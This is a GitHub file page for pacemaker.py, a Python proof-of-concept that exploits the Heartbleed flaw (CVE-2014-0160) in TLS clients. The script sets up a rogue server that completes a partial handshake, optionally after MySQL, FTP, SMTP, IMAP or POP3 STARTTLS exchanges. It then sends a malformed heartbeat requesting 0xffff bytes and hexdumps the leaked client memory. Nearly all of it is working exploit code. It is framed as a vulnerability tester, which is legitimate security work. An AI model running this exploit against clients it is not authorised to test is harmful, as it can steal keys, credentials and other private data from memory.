-
Notifications
You must be signed in to change notification settings - Fork 13
/
Copy pathpacemaker.py
executable file
·304 lines (259 loc) · 11 KB
/
pacemaker.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
#!/usr/bin/env python
# Exploitation of CVE-2014-0160 Heartbeat for the client
# Author: Peter Wu <peter@lekensteyn.nl>
try:
import socketserver
except:
import SocketServer as socketserver
import socket
import sys
import struct
import select, time
from argparse import ArgumentParser
parser = ArgumentParser(description='Test clients for Heartbleed (CVE-2014-0160)')
parser.add_argument('-6', '--ipv6', action='store_true',
help='Enable IPv6 addresses (implied by IPv6 listen addr. such as ::)')
parser.add_argument('-l', '--listen', default='',
help='Host to listen on (default "%(default)s")')
parser.add_argument('-p', '--port', type=int, default=4433,
help='TCP port to listen on (default %(default)d)')
# Note: FTP is (Explicit FTPS). Use TLS for Implicit FTPS
parser.add_argument('-c', '--client', default='tls',
choices=['tls', 'mysql', 'ftp', 'smtp', 'imap', 'pop3'],
help='Target client type (default %(default)s)')
parser.add_argument('-t', '--timeout', type=int, default=3,
help='Timeout in seconds to wait for a Heartbeat (default %(default)d)')
parser.add_argument('--skip-server', default=False, action='store_true',
help='Skip ServerHello, immediately write Heartbeat request')
parser.add_argument('-x', '--count', type=int, default=1,
help='Number of Hearbeats requests to be sent (default %(default)d)')
def make_hello(sslver, cipher):
# Record
data = '16 ' + sslver
data += ' 00 31' # Record ength
# Handshake
data += ' 02 00'
data += ' 00 2d' # Handshake length
data += ' ' + sslver
data += '''
52 34 c6 6d 86 8d e8 40 97 da
ee 7e 21 c4 1d 2e 9f e9 60 5f 05 b0 ce af 7e b7
95 8c 33 42 3f d5 00
'''
data += ' '.join('{:02x}'.format(c) for c in cipher)
data += ' 00' # No compression
data += ' 00 05' # Extensions length
# Heartbeat extension
data += ' 00 0f' # Heartbeat type
data += ' 00 01' # Length
data += ' 01' # mode
return bytearray.fromhex(data.replace('\n', ''))
def make_heartbeat(sslver):
data = '18 ' + sslver
data += ' 00 03' # Length
data += ' 01' # Type: Request
data += ' ff ff' # Payload Length
return bytearray.fromhex(data.replace('\n', ''))
def hexdump(data):
allzeroes = b'\0' * 16
zerolines = 0
for i in range(0, len(data), 16):
line = data[i:i+16]
if line == allzeroes:
zerolines += 1
if zerolines == 2:
print("*")
if zerolines >= 2:
continue
print("{:04x}: {:47} {}".format(i,
' '.join('{:02x}'.format(c) for c in line),
''.join(chr(c) if c >= 32 and c < 127 else '.' for c in line)))
class Failure(Exception):
pass
class RequestHandler(socketserver.BaseRequestHandler):
def handle(self):
self.args = self.server.args
self.sslver = '03 01' # default to TLSv1.0
remote_addr, remote_port = self.request.getpeername()[:2]
print("Connection from: {}:{}".format(remote_addr, remote_port))
try:
# Set timeout to prevent hang on clients that send nothing
self.request.settimeout(2)
prep_meth = 'prepare_' + self.args.client
if hasattr(self, prep_meth):
getattr(self, prep_meth)(self.request)
print('Pre-TLS stage completed, continuing with handshake')
if not self.args.skip_server:
self.do_serverhello()
for i in range(0, self.args.count):
try:
self.do_evil()
except OSError as e:
if i == 0: # First heartbeat?
print('Unable to send first heartbeat! ' + str(e))
else:
print('Unable to send more heartbeats, ' + str(e))
break
except (Failure, OSError, socket.timeout) as e:
print('Unable to check for vulnerability: ' + str(e))
except KeyboardInterrupt:
# Don't just abort this client, stop the server too
print('Shutting down...')
self.server.kill()
print('')
def do_serverhello(self):
# Read TLS record header
content_type, ver, rec_len = self.recv_s('>BHH', 'TLS record')
# Session-ID length (1 byte) starts at offset 38
self.expect(rec_len >= 39, 'Illegal handshake packet')
if content_type == 0x80: # SSLv2 (assume length < 256)
raise Failure('SSL 2.0 clients cannot be tested')
else:
self.expect(content_type == 22, 'Expected Handshake type')
# Read handshake
hnd = self.request.recv(rec_len)
self.expect(len(hnd) == rec_len, 'Unable to read handshake')
hnd_type, len_high, len_low, ver = struct.unpack('>BBHH', hnd[:6])
self.expect(hnd_type == 1, 'Expected Client Hello')
# hnd[6:6+32] is Random
off = 6 + 32
sid_len, = struct.unpack('B', hnd[off:off+1])
off += 1 + sid_len # Skip length and SID
# Enough room for ciphers?
self.expect(rec_len - off >= 4, 'Illegal handshake packet (2)')
ciphers_len = struct.unpack("<H", hnd[off:off+2])
off += 2
# The first cipher is fine...
cipher = bytearray(hnd[off:off+2])
self.sslver = '{:02x} {:02x}'.format(ver >> 8, ver & 0xFF)
# (1) Handshake: ServerHello
self.request.sendall(make_hello(self.sslver, cipher))
# (skip Certificate, etc.)
def do_evil(self):
# (2) HeartbeatRequest
self.request.sendall(make_heartbeat(self.sslver))
# (3) Buggy OpenSSL will throw 0xffff bytes, fixed ones stay silent
if not self.read_memory(self.request, self.args.timeout):
print("Possibly not vulnerable")
def read_memory(self, sock, timeout):
end_time = time.time() + timeout
buffer = bytearray()
wanted_bytes = 0xffff
while wanted_bytes > 0 and timeout > 0:
rl, _, _ = select.select([sock], [], [], timeout)
if not rl:
break
try:
data = rl[0].recv(wanted_bytes)
except socket.error as e:
if not len(buffer):
print('Did not receive heartbeat response! ' + str(e))
break # Connection reset?
if not data: # EOF
break
buffer += data
wanted_bytes -= len(data)
timeout = end_time - time.time()
# Check for Alert (sent by NSS)
alert = bytearray.fromhex('15 ' + self.sslver + ' 00 02')
if len(buffer) == 7 and buffer[0:5] == alert and buffer[5] in (1, 2):
lvl = 'Warning' if buffer[5] == 1 else 'Fatal'
print('Got Alert, level=' + lvl + ', description=' + str(buffer[6]))
print('Not vulnerable! (Heartbeats disabled or not OpenSSL)')
return 7
if len(buffer) > 0:
print('Client returned {0} ({0:#x}) bytes'.format(len(buffer)))
hexdump(buffer)
return len(buffer) > 0
def expect(self, cond, what):
if not cond:
raise Failure(what)
def prepare_mysql(self, sock):
# This was taken from a MariaDB client. For reference, see
# https://dev.mysql.com/doc/internals/en/connection-phase-packets.html#packet-Protocol::Handshake
greeting = '''
56 00 00 00 0a 35 2e 35 2e 33 36 2d 4d 61 72 69
61 44 42 2d 6c 6f 67 00 04 00 00 00 3d 3b 4e 57
4c 54 44 35 00 ff ff 21 02 00 0f e0 15 00 00 00
00 00 00 00 00 00 00 7c 36 33 3f 23 2e 5e 6d 2d
34 5c 54 00 6d 79 73 71 6c 5f 6e 61 74 69 76 65
5f 70 61 73 73 77 6f 72 64 00
'''
sock.sendall(bytearray.fromhex(greeting.replace('\n', '')))
print("Server Greeting sent.")
len_low, len_high, seqid, caps = self.recv_s('<BHBH', 'MySQL handshake')
packet_len = (len_high << 8) | len_low
self.expect(packet_len == 32, 'Expected SSLRequest length == 32')
self.expect((caps & 0x800), 'Missing Client SSL support')
print("Skipping {} packet bytes...".format(packet_len))
# Skip remainder (minus 2 for caps) to prepare for SSL handshake
sock.recv(packet_len - 2)
def prepare_ftp(self, sock):
sock.sendall('220 pacemaker test\r\n'.encode('ascii'))
data = sock.recv(16).decode('ascii').strip()
self.expect(data in ('AUTH SSL', 'AUTH TLS'), \
'Unexpected response: ' + data)
sock.sendall(bytearray('234 ' + data + '\r\n', 'ascii'))
def prepare_pop3(self, sock):
self.do_conversation('+OK pacemaker ready\r\n', [
('CAPA', '+OK\r\nSTLS\r\n.\r\n'),
('STLS', '+OK\r\n')
])
def prepare_smtp(self, sock):
self.do_conversation('220 pacemaker test\r\n', [
('EHLO ', '250-example.com Hi!\r\n250 STARTTLS\r\n'),
('STARTTLS', '220 Go ahead\r\n')
])
def prepare_imap(self, sock):
talk = [
('CAPABILITY', '* CAPABILITY STARTTLS\r\n'),
('STARTTLS', '')
]
sock.sendall('* OK\r\n'.encode('ascii'))
for exp, resp in talk:
data = sock.recv(256).decode('ascii').upper()
self.expect(' ' in data, 'IMAP protocol violation, got ' + data)
tag, data = data.split(' ', 2)
self.expect(data[:len(exp)] == exp, \
'Expected ' + exp + ', got ' + data)
resp += tag + ' OK\r\n'
sock.sendall(resp.encode('ascii'))
def do_conversation(self, greeting, talk):
'''Helper to handle simple request-response protocols.'''
self.request.sendall(greeting.encode('ascii'))
for exp, resp in talk:
data = self.request.recv(256).decode('ascii').upper()
self.expect(data[:len(exp)] == exp, \
'Expected ' + exp + ', got ' + data)
self.request.sendall(resp.encode('ascii'))
def recv_s(self, struct_def, what):
s = struct.Struct(struct_def)
data = self.request.recv(s.size)
msg = '{}: received only {}/{} bytes'.format(what, len(data), s.size)
self.expect(len(data) == s.size, msg)
return s.unpack(data)
class PacemakerServer(socketserver.TCPServer):
def __init__(self, args):
server_address = (args.listen, args.port)
self.allow_reuse_address = True
if args.ipv6 or ':' in args.listen:
self.address_family = socket.AF_INET6
socketserver.TCPServer.__init__(self, server_address, RequestHandler)
self.args = args
def serve_forever(self):
self.stopped = False
while not self.stopped:
self.handle_request()
def kill(self):
self.stopped = True
def serve(args):
print('Listening on {}:{} for {} clients'
.format(args.listen, args.port, args.client))
server = PacemakerServer(args)
server.serve_forever()
if __name__ == '__main__':
args = parser.parse_args()
try:
serve(args)
except KeyboardInterrupt:
pass